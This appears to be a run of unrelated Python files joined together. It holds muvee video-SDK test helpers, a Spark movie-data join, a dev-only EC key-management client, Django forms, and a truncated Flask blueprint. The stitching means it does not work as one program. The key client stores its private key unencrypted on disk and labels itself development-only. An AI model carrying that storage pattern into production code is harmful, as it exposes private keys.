        assert style in map(lambda s: s.InternalName, IMVStyleCollection(Core.Styles))
    # some cores expose a property, others only a setter method
    if hasattr(Core, "ActiveMVStyle"):
        Core.ActiveMVStyle = style
    else:
        Core.SetActiveMVStyle(style)
@is_a_stub
def PutCreditsString(credits):
    """Set the closing credits text."""
    from .mvrt import Core
    # cast IMVStyleCollection to IMVTitleCredits
    tc = gen_stub(IMVTitleCredits)(Core.Styles)
    tc.CreditsString = credits
@is_a_stub
def PutTitleString(title):
    """Set the opening title text."""
    from .mvrt import Core
    # cast IMVStyleCollection to IMVTitleCredits
    titles = gen_stub(IMVTitleCredits)(Core.Styles)
    titles.TitleString = title
@is_a_stub
def PutAspectRatio(ratio):
    """Set the output aspect ratio; must be one of the ArType values."""
    from .mvrt import Core
    assert ratio in ArType.__dict__.values()
    Core.AspectRatio = ratio
@is_a_stub
def PutDescriptorFolder(path):
    """Set the analysis-descriptor folder, creating it if missing."""
    from .mvrt import Core
    path = normalize(path)
    if not os.path.exists(path):
        os.makedirs(path)
    Core.DescriptorFolder = path
@is_a_stub
def PutSyncSoundLevel(level):
    """Set the sync-sound mix level (must be within 0..1)."""
    from .mvrt import Core
    assert 0 <= level <= 1
    Core.SyncSoundLevel = level
@is_a_stub
def PutMusicLevel(level):
    """Set the music mix level (must be within 0..1)."""
    from .mvrt import Core
    assert 0 <= level <= 1
    Core.MusicLevel = level
def CheckProgress(poll_func, poll_flag=None, timeout=3600, sleep=1, onStop=None):
    """
    Runs a while loop to check a task's running progress until it completes,
    times out, or stalls from inactivity.
    :param poll_func: Function callback to use to fetch the current progress.
    Must return a number (progress is treated as done at >= 1.0).
    :param poll_flag: `threading.Event` flag object to signal if a poll function
    should not be executed anymore (e.g. caller function has stopped a process)
    :param timeout: Maximum number of poll iterations before the task is
    considered timed out. NOTE(review): this counts iterations, i.e. roughly
    `timeout` x `sleep` seconds -- the old wording said "seconds".
    :param sleep: How many seconds to wait in between polls. Default: 1 second.
    :param onStop: Function to call when the loop has indicated that the task
    is complete, or has timed out, or has failed due to an exception.
    """
    last_prog = prog = -1
    last_changed = time.time()
    count = timeout
    try:
        while prog < 1.0:
            # bail out if the caller signalled a stop
            if poll_flag is not None and poll_flag.isSet():
                print "Stopping...",
                break
            # fetch current progress from function
            prog = poll_func.__call__()
            print r"Progress: %.2f" % prog
            if prog <= 0.0 or (prog - last_prog) < 0.01:
                # check if progress was stuck in the last 5 minutes
                assert time.time() - last_changed < 300, \
                    ("Progress stuck at %.2f%% for over 5 minutes!" % prog)
            else:
                last_prog = prog
                last_changed = time.time()
            count -= 1
            assert count >= 0, "Timed out after %d repetitions." % timeout
            time.sleep(sleep)
    except KeyboardInterrupt:
        pass
    finally:
        # cleanup and call teardown function
        print "done."
        if onStop is not None:
            onStop.__call__()
def StartCheckProgress(poll_func, poll_flag=None, timeout=3600, sleep=1, onStop=None):
    """
    Same as `CheckProgress`, but starts another thread to run it asynchronously.
    """
    threading.Thread(target=CheckProgress, \
        args=(poll_func, poll_flag, timeout, sleep, onStop)).start()
@is_a_stub
def AnalyseTillDone(resolution=1000, timeout=1800):
    """
    Starts analyzing all added sources in a separate thread and polls its
    progress until analysis is done. The function will timeout after
    `resolution` x `timeout` milliseconds.
    :param resolution: Frequency to poll for progress updates in milliseconds.
    Default: 1000 milliseconds.
    :param timeout: How many polls until the function is considered timed out.
    Default: 1800 polls.
    """
    from .mvrt import Core
    # Fix: the failure message used to be a tuple ("...", desc), which asserts
    # print unhelpfully; concatenate it like the sibling helpers do.
    assert is_true_or_non_zero(Core.StartAnalysisProc(0)), \
        "StartAnalysisProc failed: " + GetLastErrorDescription()
    CheckProgress(lambda: Core.GetAnalysisProgress(), timeout=timeout,
                  sleep=resolution/1000.0, onStop=lambda: Core.StopAnalysisProc())
@is_a_stub
def MakeTillDone(mode, duration):
    """
    Calls `IMVCore.MakeMuveeTimeline` and blocks until making is done.
    :param mode: `muvee.MakeFlags` enum
    :param duration: Duration of muvee in seconds
    """
    from .mvrt import Core
    assert is_true_or_non_zero(Core.MakeMuveeTimeline(mode, duration)), \
        "MakeMuveeTimeline failed: " + GetLastErrorDescription()
@is_a_stub
def ThreadedMakeTillDone(mode, duration):
    """
    Calls `IMVCore.MakeMuveeTimeline` in a separate thread and polls its
    progress until making is done. The function will timeout after 600 seconds.
    :param mode: `muvee.MakeFlags` enum
    :param duration: Duration of muvee in seconds
    """
    from .mvrt import Core
    # force threaded making so progress can be polled below
    mode |= MakeFlags.THREADED
    assert is_true_or_non_zero(Core.MakeMuveeTimeline(mode, duration)), \
        "MakeMuveeTimeline failed: " + GetLastErrorDescription()
    def poll():
        # GetMakeProgress returns a negative value on failure
        prog = Core.GetMakeProgress()
        assert prog >= 0, "GetMakeProgress failed: " + GetLastErrorDescription()
        return prog
    # block until done; cancel the make if the poll loop stops
    CheckProgress(poll, timeout=600, onStop=lambda: Core.CancelMake())
@is_a_stub
def ThreadedMakeForSaveTillDone(mode, duration):
    """
    Calls `IMVCore.MakeMuveeTimeline` in a separate thread with the
    `muvee.MakeFlags.FORSAVING` flag enabled, and polls its progress
    until making is done.
    :param mode: `muvee.MakeFlags` enum
    :param duration: Duration of muvee in seconds
    """
    mode |= MakeFlags.FORSAVING
    ThreadedMakeTillDone(mode, duration)
@is_a_stub
def PreviewTillDone(timeline=TimelineType.MUVEE, width=320, height=240):
    """
    Creates a WinForms Window and renders the muvee preview to it. The function
    will timeout after 3600 seconds.
    :param timeline: `muvee.TimelineFlag` enum
    :param width: Width of created window in pixels
    :param height: Height of created window in pixels
    """
    from .mvrt import Core
    assert width > 0
    assert height > 0
    # signals the background poll loop that the window is being torn down
    flag = threading.Event()
    # create winforms window
    class Preview(Window):
        def __enter__(self):
            # setup and start the rendering
            assert is_true_or_non_zero(
                Core.SetupRenderTL2Wnd(timeline, self.hwnd, 0, 0, width, height, None)), \
                'SetupRenderTL2Wnd failed: ' + GetLastErrorDescription()
            Core.StartRenderTL2WndProc(timeline)
            StartCheckProgress(self.poll, flag, onStop=lambda: self.close())
            return self
        def poll(self):
            # get preview progress
            prog = Core.GetRenderTL2WndProgress(timeline)
            assert prog >= 0, "GetRenderTL2WndProgress failed: " + GetLastErrorDescription()
            return prog
        def __exit__(self, *args):
            print 'Stopping.'
            flag.set()
            Core.StopRenderTL2WndProc(timeline)
            Core.ShutdownRenderTL2Wnd(timeline)
        def resized(self, *args):
            # re-fit the render target to the (fixed) window size
            assert is_true_or_non_zero(
                Core.RefreshTL2Wnd(timeline, self.hwnd, 0, 0, width, height, None)), \
                'RefreshTL2Wnd failed: ' + GetLastErrorDescription()
    with Preview(width, height) as p:
        p.show()
@is_a_stub
def SaveTillDone(filename, resolution=1000, timeout=1800):
    """
    Saves the video to a filename. The function will timeout after
    `resolution` x `timeout` milliseconds.
    :param filename: Path of video file to save to. May contain the
    placeholders "[CurrentStyle]" and "[ConfigName]", expanded from the
    active style name and the calling script's basename.
    :param resolution: Frequency to poll for progress updates in milliseconds.
    Default: 1000 milliseconds.
    :param timeout: How many polls until the function is considered timed out.
    Default: 1800 polls.
    """
    from .mvrt import Core
    # derive [ConfigName] from the immediate caller's source filename
    caller = inspect.getouterframes(inspect.currentframe())[1][1]
    runname = os.path.splitext(os.path.basename(caller))[0]
    path = filename.replace("[CurrentStyle]", Core.GetActiveMVStyle()) \
        .replace("[ConfigName]", runname)
    path = normalize(path)
    assert is_true_or_non_zero(
        Core.StartRenderTL2FileProc(path, None, 0, 0, 0, 0, None)), \
        ("StartRenderTL2FileProc failed: " + GetLastErrorDescription())
    def poll():
        prog = Core.GetRenderTL2FileProgress()
        assert prog >= 0, "GetRenderTL2FileProgress failed: " + GetLastErrorDescription()
        return prog
    # Fix: this previously called StartCheckProgress(self.poll, ...) -- there
    # is no `self` in a module-level function (NameError at runtime) -- and it
    # dropped the `resolution`-derived poll period used by the sibling helpers.
    StartCheckProgress(poll, timeout=timeout, \
        sleep=resolution/1000.0, \
        onStop=lambda: Core.StopRenderTL2FileProc())
@is_a_stub
def SaveTillDoneWithPreview(filename, resolution=1000, timeout=1800, width=320, height=240):
    """
    Saves the video to a filename. The function will timeout after
    `resolution` x `timeout` milliseconds.
    :param filename: Path of video file to save to. May contain the
    placeholders "[CurrentStyle]" and "[ConfigName]".
    :param resolution: Frequency to poll for progress updates in milliseconds.
    Default: 1000 milliseconds.
    :param timeout: How many polls until the function is considered timed out.
    Default: 1800 polls.
    :param width: Width of the preview window in pixels.
    :param height: Height of the preview window in pixels.
    """
    from .mvrt import Core
    assert width > 0
    assert height > 0
    # NOTE(review): this uses the OUTERMOST frame ([-1]) for [ConfigName],
    # while SaveTillDone uses the immediate caller ([1]) -- confirm which is
    # intended before relying on the expanded filename.
    caller = inspect.getouterframes(inspect.currentframe())[-1][1]
    runname = os.path.splitext(os.path.basename(caller))[0]
    path = filename.replace("[CurrentStyle]", Core.GetActiveMVStyle()) \
        .replace("[ConfigName]", runname)
    path = normalize(path)
    # signals the background poll loop that the window is being torn down
    flag = threading.Event()
    # create winforms window
    class Preview(Window):
        def __enter__(self):
            # setup and start the rendering
            assert is_true_or_non_zero(
                Core.StartRenderTL2FileProc(path, self.hwnd, 0, 0, width, height, None)), \
                ("StartRenderTL2FileProc failed: " + GetLastErrorDescription())
            StartCheckProgress(self.poll, flag, timeout=timeout, \
                sleep=resolution/1000.0, onStop=lambda: self.close())
            return self
        def poll(self):
            # get saving progress
            prog = Core.GetRenderTL2FileProgress()
            assert prog >= 0, "GetRenderTL2FileProgress failed: " + GetLastErrorDescription()
            return prog
        def __exit__(self, *args):
            print 'Stopping.'
            flag.set()
            Core.StopRenderTL2FileProc()
        def resized(self, *args):
            # re-fit the render target to the (fixed) window size
            assert is_true_or_non_zero(
                Core.RefreshTL2File(self.hwnd, 0, 0, width, height, None)), \
                'RefreshTL2File failed: ' + GetLastErrorDescription()
    with Preview(width, height) as p:
        p.show()
def PreviewSourceTillDone(src, width=320, height=240):
    """
    Creates a WinForms Window and renders the video preview to it
    :param src: source object to be rendered
    :param width: Width of created window in pixels
    :param height: Height of created window in pixels
    """
    assert width > 0
    assert height > 0
    # signals the background poll loop that the window is being torn down
    flag = threading.Event()
    # create winforms window
    class Preview(Window):
        def __enter__(self):
            # setup and start the rendering
            assert is_true_or_non_zero(
                src.SetupRender(self.hwnd, 0, 0, width, height, None)), \
                'SetupRender failed: ' + GetLastErrorDescription()
            src.StartRenderProc()
            StartCheckProgress(self.poll, flag, timeout=3600, onStop=lambda: self.close())
            return self
        def poll(self):
            # get preview progress
            prog = src.GetRenderProgress()
            assert prog >= 0, "GetRenderProgress failed: " + GetLastErrorDescription()
            return prog
        def __exit__(self, *args):
            print 'Stopping.'
            flag.set()
            src.StopRenderProc()
            src.ShutdownRender()
        def resized(self, *args):
            # re-fit the render target to the (fixed) window size
            assert is_true_or_non_zero(
                src.RefreshRender(self.hwnd, 0, 0, width, height, None)), \
                'RefreshRender failed: ' + GetLastErrorDescription()
    with Preview(width, height) as p:
        p.show()
@is_a_stub
def AddSourceVideoWithPreviewTillDone(path, height=320, width=240):
    """
    Adds a video source and previews it.
    :param path: Location of video file to be added
    :param width: Width of created window in pixels
    :param height: Height of created window in pixels
    """
    # NOTE(review): the parameter names here look swapped relative to
    # PreviewSourceTillDone(src, width, height) -- as written, `height` is
    # forwarded as the window width and `width` as the height. The defaults
    # still yield a 320x240 window; renaming would break keyword callers,
    # so only flagging it here.
    src = CreateSource(path, SourceType.VIDEO)
    AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
    PreviewSourceTillDone(src, height, width)
def translate_alignment(align):
    """
    Decodes an integer into a tuple for horizontal and vertical height
    :param align: alignment integer to decode
    """
    horiz = vert = 0
    # vertical flags live in bits 3-5 of the packed value
    vbits = (align >> 3) & 0x7
    if vbits in (0, 0x4):
        vert = 0x1      # top (also the default when no vertical bit is set)
    elif vbits == 0x2:
        vert = 0x10     # center
    elif vbits == 0x1:
        vert = 0x2      # bottom
    else:
        # more than one vertical bit set: give up without decoding horizontal
        return horiz, vert
    # horizontal flags live in bits 0-2
    hbits = align & 0x7
    if hbits in (0, 0x4):
        horiz = 0x4     # left (also the default when no horizontal bit is set)
    elif hbits == 0x2:
        horiz = 0x10    # center
    elif hbits == 0x1:
        horiz = 0x8     # right
    return horiz, vert
def add_image(xml):
    """
    Adds an image from a .rvl project file XML node
    (reads child nodes: name, rotation, minDur; optional magicSpot and
    caption nodes).
    """
    from . import IMVCoreFactory, IMVSourceCaption
    from .mvrt import Core
    # create image source
    path = xml.find('name').text
    assert os.path.isfile(path)
    src = CreateSource(path, SourceType.IMAGE)
    # add magic spot rectangles
    magicspot = xml.find('magicSpot')
    if magicspot is not None:
        rect = gen_stub(IMVTargetRect)(src)
        # only apply rectangles when the magic spot is marked active
        if int(magicspot.attrib.get('activetype', 0)) > 0:
            for r in magicspot.findall('targetrects/rect'):
                rect.AddTargetRect(float(r.attrib['X1']), float(r.attrib['X2']), \
                    float(r.attrib['Y1']), float(r.attrib['Y2']))
    # captions
    caption = xml.find('caption')
    if caption is not None:
        factory = gen_stub(IMVCoreFactory)(Core)
        fmt = factory.CreateMVTextFormatObj()
        fmt.LogFontStr = caption.attrib['font']
        fmt.Color = long(caption.attrib['fontcolor'])
        fmt.TextRectXCoord = float(caption.attrib['offsetX'])
        fmt.TextRectYCoord = float(caption.attrib['offsetY'])
        fmt.TextRectHeight = float(caption.attrib['height'])
        fmt.TextRectWidth = float(caption.attrib['width'])
        # decode the packed alignment integer into separate H/V flags
        fmt.HorAlign, fmt.VertAlign = translate_alignment(long(caption.attrib['align']))
        cap = gen_stub(IMVSourceCaption)(src)
        cap.Caption = caption.attrib['string']
        cap.TextDisplayFormat = fmt
    # orientation and duration
    info = gen_stub(IMVImageInfo)(src)
    info.SetOrientation(float(xml.find('rotation').text), True)
    info.MinImgSegDuration = float(xml.find('minDur').text)
    AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
def add_music(xml):
    """
    Adds a music file from a .rvl project file XML node
    """
    filename = xml.find('name').text
    assert os.path.isfile(filename)
    source = CreateSource(filename, SourceType.MUSIC)
    # apply the clip range only when it is non-empty
    cliprange = xml.find('cliprange').attrib
    clip_start = float(cliprange['start'])
    clip_stop = float(cliprange['stop'])
    if clip_start != clip_stop:
        source.Start = clip_start
        source.Stop = clip_stop
    AddSource(source, SourceType.MUSIC, LoadFlags.VERIFYSUPPORT)
def add_video(xml):
    """
    Adds a video file from a .rvl project file XML node
    (reads child nodes: name, cliprange; optional captions, highlights
    and excludes collections).
    """
    from . import IMVCoreFactory, IMVCaptionHighlight
    from .mvrt import Core
    # create video source
    path = xml.find('name').text
    assert os.path.isfile(path)
    src = CreateSource(path, SourceType.VIDEO)
    # captions
    for caption in xml.findall('captions/caption'):
        factory = gen_stub(IMVCoreFactory)(Core)
        fmt = factory.CreateMVTextFormatObj()
        fmt.LogFontStr = caption.find('font').text
        fmt.Color = long(caption.find('fontcolor').text)
        fmt.TextRectXCoord = float(caption.find('offsetX').text)
        fmt.TextRectYCoord = float(caption.find('offsetY').text)
        fmt.TextRectHeight = float(caption.find('height').text)
        fmt.TextRectWidth = float(caption.find('width').text)
        # decode the packed alignment integer into separate H/V flags
        fmt.HorAlign, fmt.VertAlign = translate_alignment(long(caption.find('align').text))
        cap = gen_stub(IMVCaptionHighlight)(src)
        cap.SetCaptionHighlight(caption.find('string').text,
            float(caption.find('timeStart').text),
            float(caption.find('timeEnd').text),
            fmt)
    # highlights
    for hilite in xml.findall('highlights/highlight'):
        h = gen_stub(IMVHighlight)(src)
        h.SetHighlight(float(hilite.find('start').text), float(hilite.find('stop').text))
    # exclusions
    for exclude in xml.findall('excludes/exclude'):
        e = gen_stub(IMVExclude)(src)
        # NOTE(review): AddSourceVideoWithExclusion calls SetExclusion on
        # IMVExclude; confirm SetIMVExclude is the intended method name here.
        e.SetIMVExclude(float(exclude.find('start').text), float(exclude.find('stop').text))
    # clipping
    start = float(xml.find('cliprange').attrib['start'])
    stop = float(xml.find('cliprange').attrib['stop'])
    if start != stop:
        src.Start, src.Stop = start, stop
    AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
def add_settings(xml):
    """
    Load project configuration from a .rvl project file XML node
    (style selection and parameters, title/credits, audio mix levels).
    """
    from . import IMVCoreFactory
    from .mvrt import Core
    Core.SetActiveMVStyle(xml.find('SelectedStyle').text)
    factory = gen_stub(IMVCoreFactory)(Core)
    # style parameters (only for non-default super styles)
    if xml.find('SuperStyles[@default="0"]/parameter') is not None:
        ex = gen_stub(IMVStyleEx)(Core.GetStyleCollection())
        style = xml.find('SelectedStyle').text
        for p in xml.findall('SuperStyles/parameter'):
            ex.SetParam(style, p.attrib['name'], float(p.attrib['value']))
    # style parameter strings
    if xml.find('StyleTextParams/parameter') is not None:
        ex = gen_stub(IMVStyleEx3)(Core.GetStyleCollection())
        style = xml.find('SelectedStyle').text
        for p in xml.findall('StyleTextParams/parameter'):
            ex.SetStringParam(style, p.attrib['name'], p.attrib['value'])
    # titles
    tc = gen_stub(IMVTitleCredits)(Core.Styles)
    if xml.find('EnableTitle').text == '1':
        fmt = factory.CreateMVTextFormatObj()
        fmt.LogFontStr = xml.find('TitleFont').text
        fmt.Color = long(xml.find('TitleColor').text)
        tc.TitleString = xml.find('TitleText').text
        tc.TitleTextFormat = fmt
        # background type: 1 = solid color, 2 = image
        type = int(xml.find('TitleBackgroundType').text)
        if type == 1:
            tc.TitleBackgroundColor = long(xml.find('TitleBackgroundColor').text)
        elif type == 2:
            tc.TitleBackgroundImage = xml.find('TitleBackgroundImage').text
    # credits
    if xml.find('EnableCredits').text == '1':
        fmt = factory.CreateMVTextFormatObj()
        fmt.LogFontStr = xml.find('CreditsFont').text
        fmt.Color = long(xml.find('CreditsColor').text)
        tc.CreditsString = xml.find('CreditsText').text
        tc.CreditsTextFormat = fmt
        # background type: 1 = solid color, 2 = image
        type = int(xml.find('CreditsBackgroundType').text)
        if type == 1:
            tc.CreditsBackgroundColor = long(xml.find('CreditsBackgroundColor').text)
        elif type == 2:
            tc.CreditsBackgroundImage = xml.find('CreditsBackgroundImage').text
    # volume control
    Core.AudioExtLevel = float(xml.find('AudioMix/Voiceover').text)
    Core.SoundEffectLevel = float(xml.find('AudioMix/SoundFx').text)
    Core.SyncSoundLevel = float(xml.find('AudioMix/Video').text)
    Core.MusicLevel = float(xml.find('AudioMix/Music').text)
@is_a_stub
def LoadRvlProject(path):
    """
    Loads any image, music or video sources from a .rvl project file as well as
    relevant project settings.
    :param path: Path to .rvl project file
    """
    path = normalize(path)
    assert os.path.isfile(path) and os.path.splitext(path)[1] == ".rvl"
    xml = etree.parse(path)
    # find all source files
    sources = [(f, SourceType.IMAGE) for f in xml.findall('image/file')] + \
        [(f, SourceType.MUSIC) for f in xml.findall('audio/file')] + \
        [(f, SourceType.VIDEO) for f in xml.findall('video/file')]
    # sort sources by predefined indexes; entries without an <index> node
    # sort ahead of those that have one
    def cmp_index(x, y):
        if x[0].find('index') is None:
            return -1
        if y[0].find('index') is None:
            return 1
        return cmp(int(x[0].find('index').text), int(y[0].find('index').text))
    sources.sort(cmp=cmp_index)
    detect_media(*[s[0].find('name').text for s in sources])
    # dispatch each source node to its type-specific loader
    for src, type in sources:
        if type == SourceType.IMAGE:
            add_image(src)
        elif type == SourceType.MUSIC:
            add_music(src)
        elif type == SourceType.VIDEO:
            add_video(src)
        else:
            raise NotImplementedError(str(type))
    # process settings
    add_settings(xml.find('settings'))
@is_a_stub
def VerifyVideo(src_file, expected_width, \
        expected_height, \
        expected_aspect_ratio, \
        expected_aspect_ratio_x, \
        expected_aspect_ratio_y):
    """Verify a video file's dimensions and aspect-ratio metadata.

    :param src_file: Path of the video file to inspect.
    :param expected_width: Expected pixel width.
    :param expected_height: Expected pixel height.
    :param expected_aspect_ratio: Expected aspect-ratio enum value (int-cast).
    :param expected_aspect_ratio_x: Expected aspect-ratio numerator.
    :param expected_aspect_ratio_y: Expected aspect-ratio denominator.
    :raises AssertionError: When any property does not match.
    """
    try:
        from . import IMVVideoInfo3
    # Fix: was a bare `except:`, which would also hide KeyboardInterrupt
    # and genuine errors; only the missing-name case should fall back.
    except ImportError:
        # mac doesn't have IMVVideoInfo3
        from . import IMVVideoInfo2 as IMVVideoInfo3
    src = CreateSource(src_file, SourceType.VIDEO)
    vid_info = gen_stub(IMVVideoInfo3)(src)
    assert vid_info.width == expected_width and vid_info.height == expected_height, \
        "Media width/height verification failed: %s" % src_file
    assert vid_info.AspectRatio == int(expected_aspect_ratio), \
        "Media aspect ratio verification failed: %s" % src_file
    assert vid_info.AspectRatioX == expected_aspect_ratio_x and \
        vid_info.AspectRatioY == expected_aspect_ratio_y, \
        "Media aspect ratio verification failed: %s" % src_file
@is_a_stub
def CheckLastTimelineForRange(floor, ceiling):
    """Assert the final-preview timeline duration lies within [floor, ceiling]."""
    from .mvrt import Core
    dur = Core.GetTimelineDuration(TimelineType.FINALPREV) # TimelineType for backward compatibility
    assert dur <= ceiling, \
        "dur = " + str(dur) + ", ceiling = " + str(ceiling)
    assert dur >= floor, \
        "dur = " + str(dur) + ", floor = " + str(floor)
@is_a_stub
def ClearDescriptors():
    """Delete every cached analysis descriptor file under the core's
    common data folder ('dscrp' subtree)."""
    from .mvrt import Core
    path = os.path.join(Core.CommonDataFolder, "dscrp")
    if os.path.isdir(path):
        # walk the whole tree and remove files; directories are kept
        for root, dirs, files in os.walk(path):
            for f in files:
                print "Deleting", os.path.join(root, f)
                os.remove(os.path.join(root, f))
|
from utils.default import factor_db
from utils.spark_app import MovieDataApp
spark = MovieDataApp().spark
def get_match_id():
    """Join play records with asset sources and return matched id pairs.

    Returns a Spark DataFrame with columns: os_id, title, os_cid, ys_id.
    """
    # movie_play can map one aid to several qid values; de-duplicate on aid
    # (aliased as ys_id)
    ys_df = spark.sql("select qid, aid ys_id, cid from {}.movie_play".format(factor_db)).dropDuplicates(['ys_id'])
    # db_asset_source contains duplicate aid rows; filter to source=12 and
    # de-duplicate on the aliased os_id
    os_df = spark.sql("select aid os_id, source, title, sid from movie.db_asset_source")\
        .where('source=12').dropDuplicates(['os_id'])
    # verified to contain no duplicate rows
    os_aid_cid = spark.sql("select id, cid os_cid from movie.db_asset")
    os_df = os_df.join(os_aid_cid, os_df.os_id == os_aid_cid.id, how='left').drop('id')
    # os_df.show()
    # match on (sid, cid); drop join keys and rows without a match
    tmp = os_df.join(ys_df, (os_df.sid == ys_df.qid) & (os_df.os_cid ==ys_df.cid), how='left')\
        .dropDuplicates(['os_id']).drop('source', 'sid', 'qid', 'cid').dropna()
    return tmp  # os_id, title, os_cid, ys_id
import os.path
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.exceptions import InvalidSignature
"""
TODO: This class will handle the connection to KMIP-compliant key management server
at the moment the chosen reference is: https://pykmip.readthedocs.io/en/latest/index.html
TODO: once the functions from pykmip are clear, define the abstract methods
"""
#from kmip.pie import objects
#from kmip.pie import client
#from kmip import enums
class KeyManagementClientFactory:
    """Registry of key-management client builders, keyed by client type."""

    def __init__(self):
        self._builders = {}

    def register_builder(self, key, builder):
        # A later registration for the same key overwrites the earlier one.
        self._builders[key] = builder

    def create(self, key, **kwargs):
        """Build a client for `key`; unknown keys fall back to the dev builder."""
        builder = self._builders.get(key)
        if builder:
            return builder(**kwargs)
        # return default
        return DevKeyManagementClientBuilder(**kwargs)(**kwargs)
class DevKeyManagementClientBuilder:
    """Memoizing builder: creates one DevKeyManagementClient and reuses it."""

    def __init__(self, **_ignored):
        # TODO: **_ignored could be the path where to look for and create
        # the key file
        self._instance = None

    def __call__(self, **ignored):
        # Lazily construct the singleton client on first call.
        if self._instance is None:
            self._instance = DevKeyManagementClient()
        return self._instance
class DevKeyManagementClient:
    # Basic key-management client backed by a local EC private key saved in
    # the __file__ folder ('privkey.pem').
    # For development, testing and sandbox usage ONLY -- the key is stored
    # unencrypted on disk.
    _type = 'DEV'
    _priv_key = None  # EllipticCurvePrivateKey, loaded/created in __init__

    def __init__(self):
        # Load the on-disk key; if the file is missing, generate a fresh one.
        try:
            self._priv_key = self._get_key()
        except OSError:
            self._priv_key = self._generate_key()
        except Exception as e:
            print(e)
            # Fix: chain the original error so the root cause is preserved.
            raise Exception('Something wrong with Key Management Init') from e

    def _get_key(self, *args, **kwargs):
        """
        Get the key from the default path
        the default path for now is the same folder as the __file__,
        if the .pem is not there, OSError is raised so that
        the caller can act accordingly. Notice that DEVClient uses EC.
        Returns:
        --------
        EllipticCurvePrivateKey
            as for the cryptography library
        Raises:
        -------
        OSError
            When the file is not there
        ValueError, TypeError, UnsupportedAlgorithm
            When there is something wrong in the file
        """
        filename = os.path.join(os.path.dirname(__file__), 'privkey.pem')
        with open(filename, 'rb') as pem_in:
            pemlines = pem_in.read()
        # Fix: removed a dead re-serialization of the public key that was
        # computed here and never used.
        return load_pem_private_key(pemlines, None, default_backend())

    def _generate_key(self, *args, **kwargs):
        """
        Generate a new key
        the default path for now is the same folder as the __file__,
        a new file will be saved there and it will be a PEM
        representation of an EC private key
        Returns:
        --------
        EllipticCurvePrivateKey
            as for the cryptography library
        Raises:
        -------
        OSError
            When there are problems in writing the file
        """
        priv_key = ec.generate_private_key(ec.SECP384R1(), default_backend())
        filename = os.path.join(os.path.dirname(__file__), 'privkey.pem')
        # Persist the key unencrypted (dev-only client).
        pem = priv_key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.NoEncryption()
        )
        with open(filename, 'wb') as pem_out:
            pem_out.write(pem)
        return priv_key

    def get_serialized_pub_key(self):
        """
        Get the serialised public key with PEM encoding of this eonpass node
        Returns
        -------
        bytes
            the serialised data with the PEM encoding
        """
        pub_key = self._priv_key.public_key()
        return pub_key.public_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PublicFormat.SubjectPublicKeyInfo
        )

    def sign_bytes_message(self, message):
        """
        Sign a message with the local private key.
        Parameters
        ----------
        message: bytes
            the message to be signed by the node
        Returns
        --------
        dict
            {signed, serialized_public}: the ECDSA/SHA-256 signature and the
            PEM-serialized public key, both in bytes
        Raises
        ------
        Exception
            when message is not in bytes
        """
        # Fix: reuse the canonical serialization helper instead of
        # duplicating the public_bytes() call here.
        serialized_key = self.get_serialized_pub_key()
        signed = self._priv_key.sign(message, ec.ECDSA(hashes.SHA256()))
        return {'signed': signed, 'serialized_public': serialized_key}

    def verify_signed_message(self, signed, message, serialized_public):
        """
        Check if a message and a signature match given the public key.
        The signature may come from another node, hence the explicit
        serialized public key argument.
        Parameters
        ----------
        signed: bytes
            the signed version
        message: str or bytes
            the original message that was signed
        serialized_public: str (utf-8 decoded) or bytes
            the public key in PEM encoding
        Returns
        --------
        bool
            True if the signed message checks out, False otherwise.
            Anything going wrong is caught and the method returns False.
        """
        try:
            # Fix: removed a stray "inside factory" debug print.
            if isinstance(serialized_public, str):
                serialized_public = serialized_public.encode()
            loaded_public_key = serialization.load_pem_public_key(
                serialized_public,
                backend=default_backend()
            )
            if isinstance(message, str):
                message = message.encode()
            # verify() raises InvalidSignature when the signature is bad
            loaded_public_key.verify(
                signed, message, ec.ECDSA(hashes.SHA256()))
            return True
        except ValueError as ve:
            print("value error", ve)
            return False
        except InvalidSignature as invalid:
            print("invalid", invalid)
            return False
        except Exception as e:
            print("general exc", e)
            return False
|
from django import forms
from .models import Detail, Calc, Comment, FurnitureInCalc
class DetailForm(forms.ModelForm):
    """Form for working with details (exposes every model field)."""

    class Meta:
        model = Detail
        # Fix: was `exclude = [""]`, which "excluded" a nonexistent
        # empty-named field. An empty exclude list expresses the same
        # intent -- include all model fields -- without the confusion.
        exclude = []
class CommentForm(forms.ModelForm):
    """Form for working with comments (the related calc is set by the view)."""
    class Meta:
        model = Comment
        exclude = ["calc"]
        # Bootstrap-style widgets for the rendered fields.
        widgets = {
            'name': forms.TextInput(attrs={'class':'form-control'}),
            'text': forms.Textarea(attrs={'class':'form-control'}),
        }
class CalcForm(forms.ModelForm):
    """Form for working with calculations (title and tags only)."""
    class Meta:
        model = Calc
        fields = ["title","tags"]
        # Bootstrap-style widgets for the rendered fields.
        widgets = {
            'title': forms.TextInput(attrs={'class':'form-control'}),
            'tags': forms.Select(attrs={'class':'form-control'}),
        }
class FurnitureInCalcForm(forms.ModelForm):
    """Form for adding furniture that is not in the database.

    The calc/furniture relations and the computed total price are set by
    the view, so they are excluded here.
    """
    class Meta:
        model = FurnitureInCalc
        exclude = ["calc", "furniture", "total_price"]
        # Bootstrap-style widgets for the rendered fields.
        widgets = {
            'title': forms.TextInput(attrs={'class':'form-control'}),
            'article': forms.TextInput(attrs={'class':'form-control'}),
            'price': forms.TextInput(attrs={'class':'form-control'}),
            'price_retail': forms.TextInput(attrs={'class':'form-control'}),
            'availability': forms.TextInput(attrs={'class':'form-control'}),
            'nmb': forms.TextInput(attrs={'class':'form-control'}),
        }
from flask import Blueprint, render_template, redirect, url_for
from app.forms.property import LandingAddressForm
from app.models.address import Address
from app.models.property import Property
bp = Blueprint('landing', __name__)
@bp.route('/', methods=['GET', 'POST'])
def index():
    """Landing page: address form that redirects to a new evaluation.

    On a valid POST, forwards the normalized address components to
    `evaluation.new`; otherwise renders the landing template.
    """
    form = LandingAddressForm()
    # Fix: the form was validated twice through a redundant nested
    # `if form.validate_on_submit():` -- validate once.
    if form.validate_on_submit():
        address_data = {
            'line_1': form.street_number.data + " " + form.route.data,
            'city': form.locality.data,
            'state_code': form.administrative_area_level_1.data,
